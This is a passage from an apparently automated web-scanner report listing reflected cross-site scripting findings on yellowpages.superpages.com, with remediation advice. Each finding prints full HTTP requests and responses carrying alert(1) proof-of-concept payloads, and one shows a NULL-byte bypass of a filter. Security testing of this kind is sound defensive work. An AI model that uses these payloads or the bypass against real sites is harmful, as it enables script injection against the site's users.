GET /common/jsdf462"-alert(1)-"539d2934731/swfobject.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/jsdf462&quot;-alert(1)-&quot;539d2934731/swfobject.js
Server: Unspecified
Set-Cookie: JSESSIONID=C59E3AC4220944843B48F6BB847E4A3D; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:32:35 GMT
Cache-Control: private
Content-Length: 36083


                       <!--
       
       -->


                                   
...[SNIP]...
= 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/jsdf462"-alert(1)-"539d2934731/swfobject.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.632. http://yellowpages.superpages.com/common/js/swfobject.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/swfobject.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8519c"-alert(1)-"64c92015151 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/js/swfobject.js8519c"-alert(1)-"64c92015151 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/js/swfobject.js8519c&quot;-alert(1)-&quot;64c92015151
Server: Unspecified
Set-Cookie: JSESSIONID=534F43F8840C3F0B4E24401AC93C69ED; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:32:46 GMT
Cache-Control: private
Content-Length: 36083


                       <!--
       
       -->


                                   
...[SNIP]...
llowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/js/swfobject.js8519c"-alert(1)-"64c92015151?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.633. http://yellowpages.superpages.com/common/js/widget.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/widget.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 633b9"-alert(1)-"357d38575b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common633b9"-alert(1)-"357d38575b/js/widget.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common633b9&quot;-alert(1)-&quot;357d38575b/js/widget.js
Server: Unspecified
Set-Cookie: JSESSIONID=EF961C373B22D3D46A32D7CCF7FFBD15; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:31:08 GMT
Cache-Control: private
Content-Length: 36075


                       <!--
       
       -->


                                   
...[SNIP]...
erv = 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common633b9"-alert(1)-"357d38575b/js/widget.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.634. http://yellowpages.superpages.com/common/js/widget.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/widget.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dfd66"-alert(1)-"3845f6ea7bb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/jsdfd66"-alert(1)-"3845f6ea7bb/widget.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/jsdfd66&quot;-alert(1)-&quot;3845f6ea7bb/widget.js
Server: Unspecified
Set-Cookie: JSESSIONID=0081BD1CF81E1EE984F6C8482C688002; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:31:16 GMT
Cache-Control: private
Content-Length: 36077


                       <!--
       
       -->


                                   
...[SNIP]...
= 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/jsdfd66"-alert(1)-"3845f6ea7bb/widget.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.635. http://yellowpages.superpages.com/common/js/widget.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/widget.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bcb24"-alert(1)-"a6a108b5958 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/js/widget.jsbcb24"-alert(1)-"a6a108b5958 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/js/widget.jsbcb24&quot;-alert(1)-&quot;a6a108b5958
Server: Unspecified
Set-Cookie: JSESSIONID=843B6CF9DEDBEBDE61C92986F1356639; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:31:23 GMT
Cache-Control: private
Content-Length: 36077


                       <!--
       
       -->


                                   
...[SNIP]...
/yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/js/widget.jsbcb24"-alert(1)-"a6a108b5958?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.636. http://yellowpages.superpages.com/common/shared.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/shared.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1f8b6"-alert(1)-"067297a1807 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common1f8b6"-alert(1)-"067297a1807/shared.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common1f8b6&quot;-alert(1)-&quot;067297a1807/shared.js
Server: Unspecified
Set-Cookie: JSESSIONID=6C20F9C369195FD6680789B4DF391F6D; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:31:06 GMT
Cache-Control: private
Content-Length: 36071


                       <!--
       
       -->


                                   
...[SNIP]...
erv = 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common1f8b6"-alert(1)-"067297a1807/shared.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.637. http://yellowpages.superpages.com/common/shared.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/shared.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5d77a"-alert(1)-"d7d525d2174 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/shared.js5d77a"-alert(1)-"d7d525d2174 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/shared.js5d77a&quot;-alert(1)-&quot;d7d525d2174
Server: Unspecified
Set-Cookie: JSESSIONID=8C5DF724BAACBD276D5052291066409F; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:31:14 GMT
Cache-Control: private
Content-Length: 36071


                       <!--
       
       -->


                                   
...[SNIP]...
p://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/shared.js5d77a"-alert(1)-"d7d525d2174?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.638. http://yellowpages.superpages.com/listings.jsp [C parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /listings.jsp

Issue detail

The value of the C request parameter is copied into the HTML document as plain text between tags. The payload %00e5acd<script>alert(1)</script>93fce6bf183 was submitted in the C parameter. This input was echoed as e5acd<script>alert(1)</script>93fce6bf183 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /listings.jsp?C=florists%00e5acd<script>alert(1)</script>93fce6bf183 HTTP/1.1
Host: yellowpages.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472;

Response

HTTP/1.1 500 Internal Server Error
Server: Unspecified
Set-Cookie: JSESSIONID=C5E4B03A766E89FAC74949B1AE645437; Path=/
Content-Type: text/html;charset=ISO-8859-1
Date: Thu, 03 Feb 2011 17:10:53 GMT
Connection: close


<!--

-->


                                                                        <html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="ht
...[SNIP]...
<div title=java.lang.String>javax.servlet.forward.query_string=C=florists%00e5acd<script>alert(1)</script>93fce6bf183</div>
...[SNIP]...

4.639. http://yellowpages.superpages.com/listings.jsp [C parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /listings.jsp

Issue detail

The value of the C request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b00f4"%3balert(1)//9ea80311ee5 was submitted in the C parameter. This input was echoed as b00f4";alert(1)//9ea80311ee5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /listings.jsp?C=floristsb00f4"%3balert(1)//9ea80311ee5 HTTP/1.1
Host: yellowpages.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472;

Response

HTTP/1.1 200 OK
Server: Unspecified
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Set-Cookie: JSESSIONID=8C1509CAA35A56F034FAD97133ED8997; Path=/
Set-Cookie: web=; Domain=.superpages.com; Path=/
Set-Cookie: shopping=; Domain=.superpages.com; Path=/
Set-Cookie: yp=C:floristsb00f4%22%3Balert%281%29%2F%2F9ea80311ee5$; Domain=.superpages.com; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 57369
Date: Thu, 03 Feb 2011 17:10:47 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<script language="JavaScript" type="text/javascript">
document.cookie="OpenPhones=";
</script>
<h
...[SNIP]...
lines. */
/* 09-04-08: CMM New logic to track errors via Omniture. */
s.pageName= "Error Page Try Again";
s.pageType = "errorPage";
s.prop35 = "???omniture.error.tracking.NLF???";
s.prop39 = "floristsb00f4";alert(1)//9ea80311ee5";
s.prop6 = "Dallas";
s.prop7 = "TX";
s.prop8 = "";
s.eVar10 = "Dallas TX";
var s_code=s.t();
if(s_code)
document.write(s_code);
//-->
...[SNIP]...

4.640. http://yellowpages.superpages.com/listings.jsp [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /listings.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 277d5"-alert(1)-"5f0b41eeee6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /listings.jsp277d5"-alert(1)-"5f0b41eeee6 HTTP/1.1
Host: yellowpages.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472;

Response

HTTP/1.1 404 /listings.jsp277d5&quot;-alert(1)-&quot;5f0b41eeee6
Server: Unspecified
Set-Cookie: JSESSIONID=8E53E473DA04106852BE1CA9427A533A; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 17:10:16 GMT
Connection: close


                       <!--
       
       -->


                                   
...[SNIP]...
'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/listings.jsp277d5"-alert(1)-"5f0b41eeee6?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.641. http://yellowpages.superpages.com/listings.jsp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /listings.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6eb2e"-alert(1)-"eb20ccb0e37 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /listings.jsp?6eb2e"-alert(1)-"eb20ccb0e37=1 HTTP/1.1
Host: yellowpages.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472;

Response

HTTP/1.1 200 OK
Server: Unspecified
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Set-Cookie: JSESSIONID=D605CA0AE799843045E67761B4B8FFA3; Path=/
Set-Cookie: web=; Domain=.superpages.com; Path=/
Set-Cookie: shopping=; Domain=.superpages.com; Path=/
Set-Cookie: yp=; Domain=.superpages.com; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 56970
Date: Thu, 03 Feb 2011 17:10:04 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<script language="JavaScript" type="text/javascript">
document.cookie="OpenPhones=";
</script>
<h
...[SNIP]...
ges.com';
var var_account = 'Superpagescom';
var hostServ = 'http://yellowpages.superpages.com';
var searchtype="two";
searchtype="one";
var actualUrl = "http://yellowpages.superpages.com/listings.jsp?6eb2e"-alert(1)-"eb20ccb0e37=1";
var client_id = "133515049997773";
var redirecturl = 'http://yellowpages.superpages.com/Facebook';
//-->
...[SNIP]...

4.642. http://yellowpages.superpages.com/mapbasedsearch/mapsearch.jsp [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /mapbasedsearch/mapsearch.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 443ae"-alert(1)-"9a43d5cbd11 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mapbasedsearch443ae"-alert(1)-"9a43d5cbd11/mapsearch.jsp HTTP/1.1
Host: yellowpages.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472;

Response

HTTP/1.1 404 /mapbasedsearch443ae&quot;-alert(1)-&quot;9a43d5cbd11/mapsearch.jsp
Server: Unspecified
Set-Cookie: JSESSIONID=BBEB9F1133B421096148BD47E50E8096; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 17:11:00 GMT
Connection: close


                       <!--
       
       -->


                                   
...[SNIP]...
ttp://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/mapbasedsearch443ae"-alert(1)-"9a43d5cbd11/mapsearch.jsp?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.643. http://yellowpages.superpages.com/mapbasedsearch/mapsearch.jsp [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /mapbasedsearch/mapsearch.jsp

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dd6e6"-alert(1)-"4f9032749d1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mapbasedsearch/mapsearch.jspdd6e6"-alert(1)-"4f9032749d1 HTTP/1.1
Host: yellowpages.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472;

Response

HTTP/1.1 404 /mapbasedsearch/mapsearch.jspdd6e6&quot;-alert(1)-&quot;4f9032749d1
Server: Unspecified
Set-Cookie: JSESSIONID=6A56F54F7F3562CEA77C1D9E1165869B; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 17:11:15 GMT
Connection: close


                       <!--
       
       -->


                                   
...[SNIP]...
ges.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/mapbasedsearch/mapsearch.jspdd6e6"-alert(1)-"4f9032749d1?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.644. http://yellowpages.superpages.com/profile.jsp [LID%3D parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /profile.jsp

Issue detail

The value of the LID%3D request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d5f6c"-alert(1)-"89fbe9b4764 was submitted in the LID%3D parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /profile.jsp?LID%3Dd5f6c"-alert(1)-"89fbe9b4764 HTTP/1.1
Host: yellowpages.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472;

Response

HTTP/1.1 200 OK
Server: Unspecified
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Set-Cookie: JSESSIONID=56C7E4A7E9BE4417CC27D724944372C2; Path=/
Set-Cookie: web=; Domain=.superpages.com; Path=/
Set-Cookie: shopping=; Domain=.superpages.com; Path=/
Set-Cookie: yp=; Domain=.superpages.com; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 56887
Date: Thu, 03 Feb 2011 17:10:00 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<script language="JavaScript" type="text/javascript">
document.cookie="OpenPhones=";
</script>
<h
...[SNIP]...
om';
var var_account = 'Superpagescom';
var hostServ = 'http://yellowpages.superpages.com';
var searchtype="two";
searchtype="one";
var actualUrl = "http://yellowpages.superpages.com/profile.jsp?LID%3Dd5f6c"-alert(1)-"89fbe9b4764=";
var client_id = "133515049997773";
var redirecturl = 'http://yellowpages.superpages.com/Facebook';
//-->
...[SNIP]...

4.645. http://yellowpages.superpages.com/profile.jsp [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /profile.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c50ad"-alert(1)-"eb234e6d437 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /profile.jspc50ad"-alert(1)-"eb234e6d437 HTTP/1.1
Host: yellowpages.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472;

Response

HTTP/1.1 404 /profile.jspc50ad&quot;-alert(1)-&quot;eb234e6d437
Server: Unspecified
Set-Cookie: JSESSIONID=4BAED70D8FFB9064D8585BBF87B9B20C; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 17:10:27 GMT
Connection: close


                       <!--
       
       -->


                                   
...[SNIP]...
'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/profile.jspc50ad"-alert(1)-"eb234e6d437?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.646. http://yellowpages.superpages.com/profile.jsp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /profile.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 63e22"-alert(1)-"f9f6563e460 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /profile.jsp?63e22"-alert(1)-"f9f6563e460=1 HTTP/1.1
Host: yellowpages.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472;

Response

HTTP/1.1 200 OK
Server: Unspecified
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Set-Cookie: JSESSIONID=0FD2B8CB4B419165CE2C372B67FFF46C; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 32667
Date: Thu, 03 Feb 2011 17:10:08 GMT
Connection: close


<!--
-->
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/">
<head>
<title>
Superpages.com
...[SNIP]...
ages.com';
var var_account = 'Superpagescom';
var hostServ = 'http://yellowpages.superpages.com';
var searchtype="two";
searchtype="one";
var actualUrl = "http://yellowpages.superpages.com/profile.jsp?63e22"-alert(1)-"f9f6563e460=1";
var client_id = "133515049997773";
var redirecturl = 'http://yellowpages.superpages.com/Facebook';
//-->
...[SNIP]...

